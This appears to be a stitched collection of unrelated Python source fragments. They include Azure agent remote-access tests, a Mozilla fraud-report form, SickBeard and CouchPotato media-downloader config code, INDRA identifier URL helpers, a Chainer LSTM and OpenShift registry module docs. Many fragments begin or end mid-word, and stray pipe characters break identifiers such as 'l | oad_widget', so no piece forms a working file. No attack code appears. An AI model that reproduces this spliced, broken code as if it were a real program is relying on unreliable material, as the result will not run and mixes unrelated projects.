class TestRemoteAccess(AgentTestCase):
def test_parse_remote_access(self):
data_str = load_data('wire/remote_access_single_account.xml')
remote_access = RemoteAccess(data_str)
self.assertNotEquals(None, remote_access)
self.assertEquals("1", remote_access.incarnation)
self.assertEquals(1, len(remote_access.user_list.users), "User count does not match.")
self.assertEquals("testAccount", remote_access.user_list.users[0].name, "Account name does not match")
self.assertEquals("encryptedPasswordString", remote_access.user_list.users[0].encrypted_password, "Encrypted password does not match.")
self.assertEquals("2019-01-01", remote_access.user_list.users[0].expiration, "Expiration does not match.")
@patch('azurelinuxagent.common.protocol.wire.WireClient.get_goal_state',
return_value=GoalState(load_data('wire/goal_state.xml')))
def test_update_remote_access_conf_no_remote_access(self, _):
protocol = WireProtocol('12.34.56.78')
goal_state = protocol.client.get_goal_state()
protocol.client.update_remote_access_conf(goal_state)
def test_parse_two_remote_access_accounts(self):
data_str = load_data('wire/remote_access_two_accounts.xml')
remote_access = RemoteAccess(data_str)
self.assertNotEquals(None, remote_access)
self.assertEquals("1", remote_access.incarnation)
self.assertEquals(2, len(remote_access.user_list.users), "User count does not match.")
self.assertEquals("testAccount1", remote_access.user_list.users[0].name, "Account name does not match")
self.assertEquals("encryptedPasswordString", remote_access.user_list.users[0].encrypted_password, "Encrypted password does not match.")
self.assertEquals("2019-01-01", remote_access.user_list.users[0].expiration, "Expiration does not match.")
self.assertEquals("testAccount2", remote_access.user_list.users[1].name, "Account name does not match")
self.assertEquals("encryptedPasswordString", remote_access.user_list.users[1].encrypted_password, "Encrypted password does not match.")
self.assertEquals("2019-01-01", remote_access.user_list.users[1].expiration, "Expiration does not match.")
def test_parse_ten_remote_access_accounts(self):
data_str = load_data('wire/remote_access_10_accounts.xml')
remote_access = RemoteAccess(data_str)
self.assertNotEquals(None, remote_access)
self.assertEquals(10, len(remote_access.user_list.users), "User count does not match.")
def test_parse_duplicate_remote_access_accounts(self):
data_str = load_data('wire/remote_access_duplicate_accounts.xml')
remote_access = RemoteAccess(data_str)
self.assertNotEquals(None, remote_access)
self.assertEquals(2, len(remote_access.user_list.users), "User count does not match.")
self.assertEquals("testAccount", remote_access.user_list.users[0].name, "Account name does not match")
self.assertEquals("encryptedPasswordString", remote_access.user_list.users[0].encrypted_password, "Encrypted password does not match.")
self.assertEquals("2019-01-01", remote_access.user_list.users[0].expiration, "Expiration does not match.")
self.assertEquals("testAccount", remote_access.user_list.users[1].name, "Account name does not match")
self.assertEquals("encryptedPasswordString", remote_access.user_list.users[1].encrypted_password, "Encrypted password does not match.")
self.assertEquals("2019-01-01", remote_access.user_list.users[1].expiration, "Expiration does not match.")
def test_parse_zero_remote_access_accounts(self):
data_str = load_data('wire/remote_access_no_accounts.xml')
remote_access = RemoteAccess(data_str)
self.assertNotEquals(None, remote_access)
self.assertEquals(0, len(remote_access.user_list.users), "User count does not match.")
@patch('azurelinuxagent.common.protocol.wire.WireClient.get_goal_state',
return_value=GoalState(load_data('wire/goal_state_remote_access.xml')))
@patch('azurelinuxagent.common.protocol.wire.WireClient.fetch_config',
return_value=load_data('wire/remote_access_single_account.xml'))
@patch('azurelinuxagent.common.protocol.wire.WireClient.get_header_for_cert')
def test_update_remote_access_conf_remote_access(self, _1, _2, _3):
protocol = WireProtocol('12.34.56.78')
goal_state = protocol.client.get_goal_state()
protocol.client.update_remote_access_conf(goal_state)
self.assertNotEquals(None, protocol.client.remote_access)
self.assertEquals(1, len(protocol.client.remote_access.user_list.users))
self.assertEquals('testAccount', protocol.client.remote_access.user_list.users[0].name)
self.assertEquals('encryptedPasswordString', protocol.client.remote_access.user_list.users[0].encrypted_password)
def test_parse_bad_remote_access_data(self):
data = "foobar"
self.assertRaises(xml.parsers.expat.ExpatError, RemoteAccess, data) |
# coding: utf-8
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from django import forms
from lib.l10n_utils.dotlang import _, _lazy
from bedrock.mozorg.forms import HoneyPotWidget
FRAUD_REPORT_FILE_SIZE_LIMIT = 5242880 # 5MB
class FraudReportForm(forms.Form):
input_url = forms.URLField(
max_length=40,
required=True,
error_messages={
'required': _lazy(u'Please enter a URL.'),
},
widget=forms.TextInput(
attrs={
'size': 40,
'placeholder': _lazy(u'http://offendingsite.com'),
'class': 'required fill-width',
'required': 'required',
'aria-required': 'true',
}
)
)
input_category = forms.ChoiceField(
choices=(
('Charging for software', _lazy(u'Charging for software')),
('Collecting personal information', _lazy(u'Collecting personal information')),
('Domain name violation', _lazy(u'Domain name violation')),
('Logo misuse/modification', _lazy(u'Logo misuse/modification')),
('Distributing modified Firefox/malware', _lazy(u'Distributing modified Firefox/malware')),
),
required=True,
error_messages={
'required': _lazy('Please select a category.'),
},
widget=forms.Select(
attrs={
'title': _lazy(u'Category'),
'class': 'required',
'required': 'required',
'aria-required': 'true',
}
)
)
input_product = forms.ChoiceField(
choices=(
('Firefox', _lazy(u'Firefox')),
('SeaMonkey', _lazy(u'SeaMonkey')),
('Thunderbird', _lazy(u'Thunderbird')),
('Other Mozilla Product/Project', _lazy(u'Other Mozilla Product/Project (specify)')),
),
required=True,
error_messages={
'required': _lazy('Please select a product.'),
},
widget=forms.Select(
attrs={
'title': _lazy(u'Product'),
'class': 'required',
'required': 'required',
'aria-required': 'true',
}
)
)
input_specific_product = forms.CharField(
max_length=80,
required=False,
widget=forms.TextInput(
attrs={
'size': 20,
'class': 'fill-width'
}
)
)
input_details = forms.CharField(
required=False,
widget=forms.Textarea(
attrs={
'rows': '',
'cols': '',
'class': 'fill-width'
}
)
)
input_attachment = forms.FileField(
required=False,
)
input_attachment_desc = forms.CharField(
max_length=40,
required=False,
widget=forms.Textarea(
attrs={
'rows': '',
'cols': '',
'class': 'fill-width'
}
)
)
input_email = forms.EmailField(
max_length=80,
required=False,
error_messages={
'invalid': _lazy(u'Please enter a val | id email address'),
},
widget=forms.TextInput( |
attrs={
'size': 20,
'class': 'fill-width'
}
)
)
superpriority = forms.BooleanField(widget=HoneyPotWidget, required=False)
def clean_input_attachment(self):
cleaned_data = super(FraudReportForm, self).clean()
attachment = cleaned_data.get("input_attachment")
if attachment:
if attachment._size > FRAUD_REPORT_FILE_SIZE_LIMIT:
raise forms.ValidationError(
_("Attachment must not exceed 5MB"))
return attachment
def clean_superpriority(self):
cleaned_data = super(FraudReportForm, self).clean()
honeypot = cleaned_data.pop('superpriority', None)
if honeypot:
raise forms.ValidationError(
_('Your submission could not be processed'))
|
rProvider == 'tvtorrents':
sickbeard.TVTORRENTS = curEnabled
elif curProvider == 'torrentleech':
sickbeard.TORRENTLEECH = curEnabled
elif curProvider == 'btn':
sickbeard.BTN = curEnabled
elif curProvider == 'binnewz':
sickbeard.BINNEWZ = curEnabled
elif curProvider == 't411':
sickbeard.T411 = curEnabled
elif curProvider == 'ftdb':
sickbeard.FTDB = curEnabled
elif curProvider == 'addict':
sickbeard.ADDICT = curEnabled
elif curProvider == 'fnt':
sickbeard.FNT = curEnabled
elif curProvider == 'libertalia':
sickbeard.LIBERTALIA = curEnabled
elif curProvider == 'xthor':
sickbeard.XTHOR = curEnabled
elif curProvider == 'thinkgeek':
sickbeard.THINKGEEK = curEnabled
elif curProvider == 'cpasbien':
sickbeard.Cpasbien = curEnabled
elif curProvider == 'kat':
sickbeard.kat = curEnabled
elif curProvider == 'piratebay':
sickbeard.THEPIRATEBAY = curEnabled
elif curProvider == 'ethor':
sickbeard.ETHOR = curEnabled
elif curProvider in newznabProviderDict:
newznabProviderDict[curProvider].enabled = bool(curEnabled)
else:
logger.log(u"don't know what " + curProvider + " is, skipping")
sickbeard.TVTORRENTS_DIGEST = tvtorrents_digest.strip()
sickbeard.TVTORRENTS_HASH = tvtorrents_hash.strip()
sickbeard.TORRENTLEECH_KEY = torrentleech_key.strip()
sickbeard.ETHOR_KEY = ethor_key.strip()
sickbeard.BTN_API_KEY = btn_api_key.strip()
sickbeard.T411_USERNAME = t411_username
sickbeard.T411_PASSWORD = t411_password
sickbeard.FTDB_USERNAME = ftdb_username
sickbeard.FTDB_PASSWORD = ftdb_password
sickbeard.ADDICT_USERNAME = addict_username
sickbeard.ADDICT_PASSWORD = addict_password
sickbeard.FNT_USERNAME = fnt_username
sickbeard.FNT_PASSWORD = fnt_password
sickbeard.LIBERTALIA_USERNAME = libertalia_username
sickbeard.LIBERTALIA_PASSWORD = libertalia_password
sickbeard.XTHOR_USERNAME = xthor_username
sickbeard.XTHOR_PASSWORD = xthor_password
sickbeard.THINKGEEK_USERNAME = thinkgeek_username
sickbeard.THINKGEEK_PASSWORD = thinkgeek_password
sickbeard.NZBSRUS_UID = nzbs_r_us_uid.strip()
sickbeard.NZBSRUS_HASH = nzbs_r_us_hash.strip()
sickbeard.OMGWTFNZBS_UID = omgwtfnzbs_uid.strip()
sickbeard.OMGWTFNZBS_KEY = omgwtfnzbs_key.strip()
sickbeard.PROVIDER_ORDER = provider_list
sickbeard.save_config()
if len(results) > 0:
for x in results:
logger.log(x, logger.ERROR)
ui.notifications.error('Error(s) Saving Configuration',
'<br />\n'.join(results))
else:
ui.notifications.message('Configuration Saved', ek.ek(os.path.join, sickbeard.CONFIG_FILE) )
redirect("/config/providers/")
class ConfigNotifications:
@cherrypy.expose
def index(self):
t = PageTemplate(file="config_notifications.tmpl")
t.submenu = ConfigMenu
return _munge(t)
@cherrypy.expose
def saveNotifications(self, use_xbmc=None, xbmc_notify_onsnatch=None, xbmc_notify_ondownload=None, xbmc_update_onlyfirst=None, xbmc_notify_onsubtitledownload=None,
xbmc_update_library=None, xbmc_update_full=None, xbmc_host=None, xbmc_username=None, xbmc_password=None,
use_plex=None, plex_notify_onsnatch=None, plex_notify_ondownload=None, plex_notify_onsubtitledownload=None, plex_update_library=None,
plex_server_host=None, plex_host=None, plex_username=None, plex_password=None,
use_growl=None, growl_notify_onsnatch=None, growl_notify_ondownload=None, growl_notify_onsubtitledownload=None, growl_host=None, growl_password=None,
use_prowl=None, prowl_notify_onsnatch=None, prowl_notify_ondownload=None, prowl_notify_onsubtitledownload=None, prowl_api=None, prowl_priority=0,
use_twitter=None, twitter_notify_onsnatch=None, twitter_notify_ondownload=None, twitter_notify_onsubtitledownload=None,
use_boxcar=None, boxcar_notify_onsnatch=None, boxcar_notify_ondownload=None, boxcar_notify_onsubtitledownload=None, boxcar_username=None,
use_boxcar2=None, boxcar2_notify_onsnatch=None, boxcar2_notify_ondownload=None, boxcar2_notify_onsubtitledownload=None, boxcar2_access_token=None, boxcar2_sound=None,
use_pushover=None, pushover_notify_onsnatch=None, pushover_notify_ondownload=None, pushover_notify_onsubtitledownload=None, pushover_userkey=None, pushover_prio=None,
use_libnotify=None, libnotify_notify_onsnatch=None, libnotify_notify_ondownload=None, libnotify_notify_onsubtitledownload=None,
use_nmj=None, nmj_host=None, nmj_database=None, nmj_mount=None, use_synoindex=None,
use_nmjv2=None, nmjv2_host=None, nmjv2_dbloc=None, nmjv2_database=None,
use_trakt=None, trakt_username=None, trakt_password=None, trakt_api=None,trakt_remove_watchlist=None,trakt_use_watchlist=None,trakt_start_paused=None,trakt_method_add=None,
use_betaseries=None, betaseries_username=None, betaseries_password=None,
use_synologynotifier=None, synologynotifier_notify_onsnatch=None, synologynotifier_notify_ondownload=None, synologynotifier_notify_onsubtitledownload=None,
use_pytivo=None, pytivo_notify_onsnatch=None, pytivo_notify_ondownload=None, pytivo_notify_onsubtitledownload=None, pytivo_update_library=None,
pytivo_host=None, pytivo_share_name=None, pytivo_tivo_name=None,
use_nma=None, nma_notify_onsnatch=None, nma_notify_ondownload=None, nma_notify_onsubtitledownload=None, nma_api=None, nma_priority=0,
use_pushalot=None, pushalot_notify_onsnatch=None, pushalot_notify_ondownload=None, pushalot_notify_onsubtitledownload=None, pushalot_authorizationtoken=None,
use_pushbullet=None, pushbullet_notify_onsnatch=None, pushbullet_notify_ondownload=None, pushbullet_notify_onsubtitledownload=None, pushbullet_api=None, pushbullet_device=None, pushbullet_device_list=None, pushbullet_channel_list=None,
use_mail=None, mail_username=None, mail_password=None, mail_server=None, mail_ssl=None, mail_from=None, mail_to=None, mail_notify_onsnatch=None ):
results = []
if xbmc_notify_onsnatch == "on":
xbmc_notify_onsnatch = 1
else:
xbmc_notify_onsnatch = 0
if xbmc_notify_ondownload == "on":
xbmc_notify_ondownload = 1
else:
xbmc_notify_ondownload = 0
if xbmc_notify_onsubtitledownload == "on":
xbmc_notify_onsubtitledownload = 1
else:
xbmc_notify_onsubtitledownload = 0
if xbmc_update_library == "on":
xbmc_update_library = 1
else:
xbmc_update_library = 0
if xbmc_update_full == "on":
xbmc_update_full = 1
else:
xbmc_update_full = 0
if xbmc_update_onlyfirst == "on":
xbmc_update_onlyfirst = 1
else:
xbmc_up | date_onlyfirst = 0
if use_xbmc == "on":
use_xbmc = 1
else:
use_xbmc = 0
| if plex_update_library == "on":
plex_update_library = 1
else:
plex_update_library = 0
if plex_notify_onsnatch == "on":
plex_n |
# coding: utf-8
# Copyright (c) 2015 Fabian Barkhau <fabian.barkhau@gmail.com>
# License: MIT (see LICENSE file)
from kivy.uix.label import Label
from gravur.utils import l | oad_widget
@load_widget
class LabelBox(Label):
pas | s
|
# Copyright (c) 2015 Tanium Inc
#
# Generated from console.wsdl version 0.0.1
#
#
from .base import BaseType
class SavedActionApproval(BaseType):
_soap_tag = 'saved_action_approval'
def __init__(self):
BaseType.__i | nit__(
self,
simple_properties={'id': int,
'name': str,
'approved_flag': int},
complex_properties={'metadata': MetadataList},
list_properties={},
)
self.id = None
self.name = None
self.approved_flag = None
| self.metadata = None
from metadata_list import MetadataList
|
urn mapping
else:
return identifiers_ns.upper()
def get_ns_id_from_identifiers(identifiers_ns, identifiers_id):
"""Return a namespace/ID pair compatible with INDRA from identifiers.
Parameters
----------
identifiers_ns : str
An identifiers.org standard namespace.
identifiers_id : str
An identifiers.org standard ID in the given namespace.
Returns
-------
(str, str)
A namespace and ID that are valid in INDRA db_refs.
"""
reg_entry = identifiers_registry.get(identifiers_ns.lower() | )
db_ns = get_ns_from_identifiers(identifiers_ns)
if db_ns is None:
return None, None
db_id = identifiers_id
if reg_entry['namespace_embedded']:
if not identifiers_id.startswith(identifiers_ns.upper()):
db_id = '%s:%s' % (identifiers_ns.upper(), identifiers_id)
return db_ns, db_id
def get_identifiers_ns(db_name):
"""Map an INDRA namespace to an identif | iers.org namespace when possible.
Example: this can be used to map 'UP' to 'uniprot'.
Parameters
----------
db_name : str
An INDRA namespace to map to identifiers.org
Returns
-------
str or None
An identifiers.org namespace or None if not available.
"""
mapped_db_name = identifiers_mappings.get(db_name, db_name.lower())
if mapped_db_name not in identifiers_registry:
return None
return mapped_db_name
def get_url_prefix(db_name):
"""Return the URL prefix for a given namespace."""
identifiers_ns = get_identifiers_ns(db_name)
if identifiers_ns:
identifiers_entry = identifiers_registry.get(identifiers_ns)
if not identifiers_entry['namespace_embedded']:
return '%s/%s:' % (identifiers_url, identifiers_ns.lower())
else:
return '%s/' % identifiers_url
else:
if db_name in url_prefixes:
return url_prefixes[db_name]
return None
def get_identifiers_url(db_name, db_id):
"""Return an identifiers.org URL for a given database name and ID.
Parameters
----------
db_name : str
An internal database name: HGNC, UP, CHEBI, etc.
db_id : str
An identifier in the given database.
Returns
-------
url : str
An identifiers.org URL corresponding to the given database name and ID.
"""
# This is the case where we have a prefix that we can simply attach the
# db_id to to get the desired URL.
if db_name == 'CHEMBL':
db_id = ensure_chembl_prefix(db_id)
elif db_name == 'CHEBI':
db_id = ensure_chebi_prefix(db_id)
prefix = get_url_prefix(db_name)
if prefix:
return '%s%s' % (prefix, db_id)
# Otherwise, we have to handle some special cases
bel_scai_url = 'https://arty.scai.fraunhofer.de/artifactory/bel/namespace/'
if db_name == 'LINCS':
if db_id.startswith('LSM-'): # Lincs Small Molecule ID
url = identifiers_url + '/lincs.smallmolecule:%s' % db_id
elif db_id.startswith('LCL-'): # Lincs Cell Line ID
url = identifiers_url + '/lincs.cell:%s' % db_id
else: # Assume LINCS Protein
url = identifiers_url + '/lincs.protein:%s' % db_id
elif db_name == 'CHEMBL':
if not db_id.startswith('CHEMBL'):
db_id = 'CHEMBL%s' % db_id
url = identifiers_url + '/chembl.compound:%s' % db_id
elif db_name == 'HMS-LINCS':
url = 'http://lincs.hms.harvard.edu/db/sm/%s-101' % db_id
# Special cases with no identifiers entry
elif db_name == 'SCHEM':
url = bel_scai_url + 'selventa-legacy-chemicals/' + \
'selventa-legacy-chemicals-20150601.belns'
elif db_name == 'SCOMP':
url = bel_scai_url + 'selventa-named-complexes/' + \
'selventa-named-complexes-20150601.belns'
elif db_name == 'SFAM':
url = bel_scai_url + 'selventa-protein-families/' + \
'selventa-protein-families-20150601.belns'
elif db_name == 'TEXT' or db_name == 'TEXT_NORM':
return None
else:
logger.warning('Unhandled name space %s' % db_name)
url = None
return url
def parse_identifiers_url(url):
"""Retrieve database name and ID given the URL.
Parameters
----------
url : str
An identifiers.org URL to parse.
Returns
-------
db_name : str
An internal database name: HGNC, UP, CHEBI, etc. corresponding to the
given URL.
db_id : str
An identifier in the database.
"""
# Try matching by string pattern
db_ns, db_id = None, None
url_pattern = \
r'(?:https?)://identifiers.org/([A-Za-z0-9.-]+)(/|:)([A-Za-z0-9:_.-]+)'
match = re.match(url_pattern, url)
if match is not None:
g = match.groups()
if len(g) == 3:
pattern_ns, pattern_id = g[0], g[2]
db_ns, db_id = get_ns_id_from_identifiers(pattern_ns, pattern_id)
if db_ns == 'HGNC':
if db_id.startswith('HGNC:'):
db_id = db_id[5:]
# If we got UP and UPPRO, return UPPRO
if db_ns == 'UP' and '#PRO_' in url:
db_ns = 'UPPRO'
db_id = url[url.find('PRO_'):]
if db_ns and db_id:
return db_ns, db_id
for ns, prefix in url_prefixes.items():
if url.startswith(prefix):
return ns, url[len(prefix):]
# Handle other special cases
for part in ['/lincs.smallmolecule', '/lincs.cell', '/lincs.protein']:
if part in url:
return 'LINCS', url[(url.find(part) + len(part) + 1):]
if '/chembl.compound' in url:
return 'CHEMBL', url[
(url.find('/chembl.compound') + len('/chembl.compound:')):]
if 'lincs.hms.harvard.edu' in url:
return 'HMS-LINCS', url[len('http://lincs.hms.harvard.edu/db/sm/'):-4]
if 'selventa-legacy-chemicals/' in url:
return 'SCHEM', None
if 'selventa-named-complexes/' in url:
return 'SCOMP', None
if 'selventa-protein-families/' in url:
return 'SFAM', None
else:
logger.warning('Could not parse URL %s' % url)
return None, None
def namespace_embedded(db_ns: str) -> bool:
"""Return true if this namespace requires IDs to have namespace embedded.
This function first maps the given namespace to an identifiers.org
namespace and then checks the registry to see if namespaces need
to be embedded in IDs. If yes, it returns True. If not, or the ID can't
be mapped to identifiers.org, it returns False
Parameters
----------
db_ns :
The namespace to check.
Returns
-------
:
True if the namespace is known to be embedded in IDs of this
namespace. False if unknown or known not to be embedded.
"""
identifiers_ns = get_identifiers_ns(db_ns)
if identifiers_ns:
identifiers_entry = identifiers_registry.get(identifiers_ns)
if identifiers_entry['namespace_embedded']:
return True
return False
def ensure_prefix_if_needed(db_ns: str, db_id: str) -> str:
"""Return an ID ensuring a namespace prefix if known to be needed.
Parameters
----------
db_ns :
The namespace associated with the identifier.
db_id :
The original identifier.
Returns
-------
:
The identifier with namespace embedded if needed.
"""
if namespace_embedded(db_ns):
return ensure_prefix(db_ns, db_id)
return db_id
def ensure_prefix(db_ns, db_id, with_colon=True):
"""Return a valid ID that has the given namespace embedded.
This is useful for namespaces such as CHEBI, GO or BTO that require
the namespace to be part of the ID. Note that this function always
ensures that the given db_ns is embedded in the ID and can handle the
case whene it's already present.
Parameters
----------
db_ns : str
A namespace.
db_id : str
An ID within that namespace which should have the namespace
as a prefix in it.
with_colon: Optional[bool]
If True, the namespace prefix is followed by a colon in |
if x | () and y( | ) and z():
a()
else:
b()
|
def action_comment_load_more(context, action, entity_type, entity_id, last_id, parent_id, **args):
try:
entity = IN.entitier.load_single(entity_type, int(entity_id))
if not entity:
return
output = Object()
db = IN.db
connection = db.connection
container_id = IN.commenter.get_container_id(entity)
# TODO: paging
# get total
total = 0
limit = 10
cursor = db.select({
'table' : 'entity.comment',
'columns' : ['count(id)'],
'where' : [
['container_id', container_id],
['id', '<', int(last_id)], # load previous
['parent_id', parent_id],
['status', 1],
| ],
}).execute()
if cursor.rowcount >= 0:
total = int(cursor.fetchone()[0])
more_id = '_'.join(('more-commens', entity_type, str(entity_id), str(parent_id)))
if total > 0:
cursor = db.select({
'table' : 'entity.comment',
'columns' : ['id'],
'where' : [
['container_id', c | ontainer_id],
['id', '<', int(last_id)],
['parent_id', parent_id], # add main level comments only
['status', 1],
],
'order' : {'created' : 'DESC'},
'limit' : limit,
}).execute()
ids = []
last_id = 0
if cursor.rowcount >= 0:
for row in cursor:
ids.append(row['id'])
last_id = ids[-1] # last id
comments = IN.entitier.load_multiple('Comment', ids)
for id, comment in comments.items():
comment.weight = id # keep asc order
output.add(comment)
remaining = total - limit
if remaining > 0 and last_id > 0:
output.add('TextDiv', {
'id' : more_id,
'value' : str(remaining) + ' more comments',
'css' : ['ajax i-text-center i-text-danger pointer'],
'attributes' : {
'data-href' : ''.join(('/comment/more/!Content/', str(entity_id), '/', str(last_id), '/', str(parent_id)))
},
'weight' : -1,
})
#if not output:
#output.add(type = 'TextDiv', data = {})
output = {more_id : output}
context.response = In.core.response.PartialResponse(output = output)
except:
IN.logger.debug()
|
et_session
from couchpotato.api import addApiView
from couchpotato.core.event import addEvent
from couchpotato.core.helpers.encoding import toUnicode
from couchpotato.core.helpers.request import jsonified, getParams
from couchpotato.core.helpers.variable import mergeDicts, md5, getExt
from couchpotato.core.logger import CPLog
from couchpotato.core.plugins.base import Plugin
from couchpotato.core.settings.model import Quality, Profile, ProfileType
from sqlalchemy.sql.expression import or_
import os.path
import re
import time
log = CPLog(__name__)
class QualityPlugin(Plugin):
qualities = [
{'identifier': 'bd50', 'hd': True, 'size': (15000, 60000), 'label': 'BR-Disk', 'alternative': ['bd25'], 'allow': ['1080p'], 'ext':[], 'tags': ['bdmv', 'certificate', ('complete', 'bluray')]},
{'identifier': '1080p', 'hd': True, 'size': (5000, 20000), 'label': '1080P', 'width': 1920, 'height': 1080, 'alternative': [], 'allow': [], 'ext':['mkv', 'm2ts'], 'tags': ['m2ts']},
{'identifier': '720p', 'hd': True, 'size': (3500, 10000), 'label': '720P', 'width': 1280, 'height': 720, 'alternative': [], 'allow': [], 'ext':['mkv', 'ts']},
{'identifier': 'brrip', 'hd': True, 'size': (700, 7000), 'label': 'BR-Rip', 'alternative': ['bdrip'], 'allow': ['720p'], 'ext':['avi']},
{'identifier': 'dvdr', 'size': (3000, 10000), 'label': 'DVD-R', 'alternative': [], 'allow': [], 'ext':['iso', 'img'], 'tags': ['pal', 'ntsc', 'video_ts', 'audio_ts']},
{'identifier': 'dvdrip', 'size': (600, 2400), 'label': 'DVD-Rip', 'width': 720, 'alternative': ['dvdrip'], 'allow': [], 'ext':['avi', 'mpg', 'mpeg'], 'tags': [('dvd', 'rip'), ('dvd', 'xvid'), ('dvd', 'divx')]},
{'identifier': 'scr', 'size': (600, 1600), 'label': 'Screener', 'alternative': ['screener', 'dvdscr', 'ppvrip'], 'allow': ['dvdr', 'dvd'], 'ext':['avi', 'mpg', 'mpeg']},
{'identifier': 'r5', 'size': (600, 1000), 'label': 'R5', 'alternative': [], 'allow': ['dvdr'], 'ext':['avi', 'mpg', 'mpeg']},
{'identifier': 'tc', 'size': (600, 1000), 'label': 'TeleCine', 'alternative': ['telecine'], 'allow': [], 'ext':['avi', 'mpg', 'mpeg']},
{'identifier': 'ts', 'size': (600, 1000), 'label': 'TeleSync', 'alternative': ['telesync', 'hdts'], 'allow': [], 'ext':['avi', 'mpg', 'mpeg']},
{'identifier': 'cam', 'size': (600, 1000), 'label': 'Cam', 'alternative': ['camrip', 'hdcam'], 'allow': [], 'ext':['avi', 'mpg', 'mpeg']}
]
pre_releases = ['cam', 'ts', 'tc', 'r5', 'scr']
def __init__(self):
addEvent('quality.all', self.all)
addEvent('quality.single', self.single)
addEvent('quality.guess', self.guess)
addEvent('quality.pre_releases', self.preReleases)
addApiView('quality.size.save', self.saveSize)
addApiView('quality.list', self.allView, docs = {
'desc': 'List all available qualities',
'return': {'type': 'object', 'example': """{
'success': True,
'list': array, qualities
}"""}
})
addEvent('app.initialize', self.fill, priority = 10)
def preReleases(self):
return self.pre_releases
def allView(self):
return jsonified({
'success': True,
'list': self.all()
})
def all(self):
db = get_session()
qualities = db.query(Quality).all()
temp | = []
for quality in qualities:
q = mergeDicts(self.getQuality(quality.identifier), quality.to_dict())
temp.append(q)
return temp
def single(self, identifier = ''):
db = get_session()
quality_dict = {}
quality = db.query(Quality).filter(or_(Quality.identifier == identifier, Quality.id == identifier)).first()
if quality:
quality_dict = dict(self.getQuality(quality.identifier), * | *quality.to_dict())
return quality_dict
def getQuality(self, identifier):
for q in self.qualities:
if identifier == q.get('identifier'):
return q
def saveSize(self):
params = getParams()
db = get_session()
quality = db.query(Quality).filter_by(identifier = params.get('identifier')).first()
if quality:
setattr(quality, params.get('value_type'), params.get('value'))
db.commit()
return jsonified({
'success': True
})
def fill(self):
db = get_session();
order = 0
for q in self.qualities:
# Create quality
qual = db.query(Quality).filter_by(identifier = q.get('identifier')).first()
if not qual:
log.info('Creating quality: %s', q.get('label'))
qual = Quality()
qual.order = order
qual.identifier = q.get('identifier')
qual.label = toUnicode(q.get('label'))
qual.size_min, qual.size_max = q.get('size')
db.add(qual)
# Create single quality profile
prof = db.query(Profile).filter(
Profile.core == True
).filter(
Profile.types.any(quality = qual)
).all()
if not prof:
log.info('Creating profile: %s', q.get('label'))
prof = Profile(
core = True,
label = toUnicode(qual.label),
order = order
)
db.add(prof)
profile_type = ProfileType(
quality = qual,
profile = prof,
finish = True,
order = 0
)
prof.types.append(profile_type)
order += 1
db.commit()
time.sleep(0.3) # Wait a moment
return True
def guess(self, files, extra = {}):
# Create hash for cache
hash = md5(str([f.replace('.' + getExt(f), '') for f in files]))
cached = self.getCache(hash)
if cached and extra is {}: return cached
for cur_file in files:
size = (os.path.getsize(cur_file) / 1024 / 1024) if os.path.isfile(cur_file) else 0
words = re.split('\W+', cur_file.lower())
for quality in self.all():
# Check tags
if quality['identifier'] in words:
log.debug('Found via identifier "%s" in %s', (quality['identifier'], cur_file))
return self.setCache(hash, quality)
if list(set(quality.get('alternative', [])) & set(words)):
log.debug('Found %s via alt %s in %s', (quality['identifier'], quality.get('alternative'), cur_file))
return self.setCache(hash, quality)
for tag in quality.get('tags', []):
if isinstance(tag, tuple) and '.'.join(tag) in '.'.join(words):
log.debug('Found %s via tag %s in %s', (quality['identifier'], quality.get('tags'), cur_file))
return self.setCache(hash, quality)
if list(set(quality.get('tags', [])) & set(words)):
log.debug('Found %s via tag %s in %s', (quality['identifier'], quality.get('tags'), cur_file))
return self.setCache(hash, quality)
# Try again with loose testing
quality = self.guessLoose(hash, extra = extra)
if quality:
return self.setCache(hash, quality)
log.debug('Could not identify quality for: %s', files)
return None
def guessLoose(self, hash, extra):
for quality in self.all():
# Check width resolution, range 20
if (quality.get('width', 720) - 20) <= extra.get('resolution_width', 0) <= (quality.get('width', 720) + 20):
log.debug('Found %s via resolution_width: %s == %s', (quality['identifier'], quality.get('width', 720), extra.get('resolution_width', 0)))
return self.setCache(hash, quality)
# Check height resolution, range 20
if (quality.get('height', 480) - 20) |
#coding:utf-8
import numpy as np
from chainer import Variable, FunctionSet
import chainer.functions as F
class LSTM(FunctionSet):
def __init__(self,f_n_units, n_units):
super(LSTM, self).__init__(
l1_x = F.Linear(f_n_units, 4*n_units),
l1_h = F.Linear(n_units, 4*n_units),
l6 = F.Linear(n_units, f_n_units)
| )
# パラメータの値を-0.08~0.08の範囲で初期化
for param in self. | parameters:
param[:] = np.random.uniform(-0.08, 0.08, param.shape)
def forward_one_step(self, x_data, y_data, state, train=True,dropout_ratio=0.0):
x ,t = Variable(x_data,volatile=not train),Variable(y_data,volatile=not train)
h1_in = self.l1_x(F.dropout(x, ratio=dropout_ratio, train=train)) + self.l1_h(state['h1'])
c1, h1 = F.lstm(state['c1'], h1_in)
y = self.l6(F.dropout(h1, ratio=dropout_ratio, train=train))
state = {'c1': c1, 'h1': h1}
return state, F.mean_squared_error(y, t)
def predict(self, x_data, y_data, state):
x ,t = Variable(x_data,volatile=False),Variable(y_data,volatile=False)
h1_in = self.l1_x(x) + self.l1_h(state['h1'])
c1, h1 = F.lstm(state['c1'], h1_in)
y = self.l6(h1)
state = {'c1': c1, 'h1': h1}
return state,F.mean_squared_error(y,t)
def make_initial_state(n_units,train = True):
return {name: Variable(np.zeros((1,n_units), dtype=np.float32),
volatile=not train)
for name in ('c1', 'h1')}
#for name in ('c1', 'h1', 'c2', 'h2', 'c3', 'h3','c4','h4','c5','h5')}
|
e:
description:
- The selector when filtering on node labels
required: false
default: None
aliases: []
images:
description:
- The image to base this registry on - ${component} will be replaced with --type
required: 'openshift3/ose-${component}:${version}'
default: None
aliases: []
latest_images:
description:
- If true, attempt to use the latest image for the registry instead of the latest release.
required: false
default: False
aliases: []
labels:
description:
- A set of labels to uniquely identify the registry and its components.
required: false
default: None
aliases: []
enforce_quota:
description:
- If set, the registry will refuse to write blobs if they exceed quota limits
required: False
default: False
aliases: []
mount_host:
description:
- If set, the registry volume will be created as a host-mount at this path.
required: False
default: False
aliases: []
ports:
description:
- A comma delimited list of ports or port pairs to expose on the registry | pod. The default is set for 5000.
required: False
default: [5000]
aliases: []
replicas:
description:
| - The replication factor of the registry; commonly 2 when high availability is desired.
required: False
default: 1
aliases: []
selector:
description:
- Selector used to filter nodes on deployment. Used to run registries on a specific set of nodes.
